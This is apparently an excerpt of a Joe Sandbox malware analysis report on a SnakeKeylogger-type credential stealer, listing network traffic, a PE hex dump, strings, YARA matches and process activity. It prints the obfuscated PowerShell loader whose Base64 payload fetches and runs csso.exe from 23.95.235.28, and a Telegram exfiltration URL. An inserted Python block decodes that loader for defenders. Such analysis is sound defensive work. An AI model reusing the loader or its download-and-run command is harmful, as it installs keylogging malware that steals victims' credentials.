                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 00:18:54 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 12 Mar 2025 09:14:06 GMTETag: "eae00-63021a093dc5f"Accept-Ranges: bytesContent-Length: 962048Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4f 50 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 cc 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 40 81 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 ac 25 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 
00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 25 02 00 00 70 0c 00 00 26 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 a0 0e 00 00 72 00 00 00 3c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 23.95.235.28 23.95.235.28
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49695 -> 158.101.44.242:80
                    Source: global trafficHTTP traffic detected: GET /50/csso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49696 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28 (this entry is repeated 50 times in the report)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_029D7A38 URLDownloadToFileW,3_2_029D7A38
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/csso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1402683143.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1404410976.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/50/csso.exe
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000267E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1396844309.00000000024CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com(x86)/AutoIt3/AutoItX/.0/Managed
                    Source: powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00093F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0008001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                    System Summary

                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
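The PowerShell command line recorded above hides its second stage behind two layers: the inner IEX is fed a string assembled from single-quoted fragments and [char] codes (so that "::" and the surrounding double quotes never appear literally), and that string in turn decodes a Base64 payload padded with long runs of spaces. The following Python is an added example, not part of the Joe Sandbox report: it rebuilds the inner string, decodes the payload, collapses the padding, and pulls out the indicators a responder needs. The command line and Base64 blob are the ones recorded in this report; the function names and the regular expressions are mine. It decodes offline and needs only the standard library.

```python
import base64
import re

# Base64 payload exactly as it appears in the cmd.exe -> powershell.exe entry of this report.
PAYLOAD_B64 = "JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI="

# The -C argument as recorded (the trailing quote belongs to cmd.exe's /c string and is dropped).
OBFUSCATED_CMDLINE = (
    "PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; "
    + "Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'"
    + "+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'" + PAYLOAD_B64 + "'+[cHar]34+'))')))"
)

# A single-quoted PowerShell literal ('' is an escaped quote) or a [char]N with N decimal or 0x hex.
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_B64_ARG = re.compile(r'frombase64string\(\s*"?([A-Za-z0-9+/=]{16,})"?\s*\)', re.IGNORECASE)


def evaluate_concat(expr):
    """Evaluate a PowerShell expression built only from 'literals' and [char]N joined by +."""
    parts = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        else:
            parts.append(chr(int(m.group(2), 0)))  # int(..., 0) accepts both 58 and 0x3A
    return "".join(parts)


def decode_b64_script(b64):
    """Decode a Base64 blob: re-pad truncated log copies, then pick UTF-16 (-EncodedCommand) or UTF-8."""
    b64 = b64 + "=" * (-len(b64) % 4)
    data = base64.b64decode(b64)
    if b"\x00" in data[:64]:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def decode_stage(cmdline):
    """Peel both layers: rebuild the inner IEX string, then decode the Base64 it passes on."""
    inner = evaluate_concat(cmdline)
    blobs = _B64_ARG.findall(inner)
    if not blobs:
        raise ValueError("no FromBase64String() argument found")
    script = "\n".join(decode_b64_script(b) for b in blobs)
    # The author padded every token with runs of spaces; collapse them so the script is readable.
    return re.sub(r"\s+", " ", script).strip()


def extract_iocs(script):
    """Indicators from the decoded stage: download URLs, drop paths, P/Invoke DLLs and native calls."""
    return {
        "urls": re.findall(r"https?://[^\s\"'<>]+", script),
        "drop_paths": re.findall(r"\$env:[a-z_]+\\[^\s\"',)]+", script, re.IGNORECASE),
        "dll_imports": re.findall(r'DllImport\(\s*"([^"]+)"', script),
        "native_calls": re.findall(r"\bextern\s+\w+\s+(\w+)\s*\(", script),
    }


if __name__ == "__main__":
    stage2 = decode_stage(OBFUSCATED_CMDLINE)
    print(stage2)
    print(extract_iocs(stage2))
```

The decoded stage is a one-liner that uses Add-Type to compile a P/Invoke stub for urlmon!URLDownloadToFile (which is why csc.exe and cvtres.exe appear in the process tree), downloads csso.exe from 23.95.235.28 into %APPDATA%, sleeps three seconds and runs it with Invoke-Item. Note that the [char] trick defeats simple string matches on "::" and on the quoted Base64, but not a tokenizer like the one above; keep the UTF-16 branch, because the same family of loaders often switches to -EncodedCommand, whose payload is UTF-16LE.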
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00023B3A This is a third-party compiled AutoIt script.
                    Source: csso.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                    Source: csso.exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csso.exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                    Source: csso[1].exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csso[1].exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\csso.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0008A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00078310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0002E6A0
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0004D975
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0002FCE0
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000421C5
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000562D2
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000A03DA
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0005242E
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000425FA
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0007E616
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000366E1
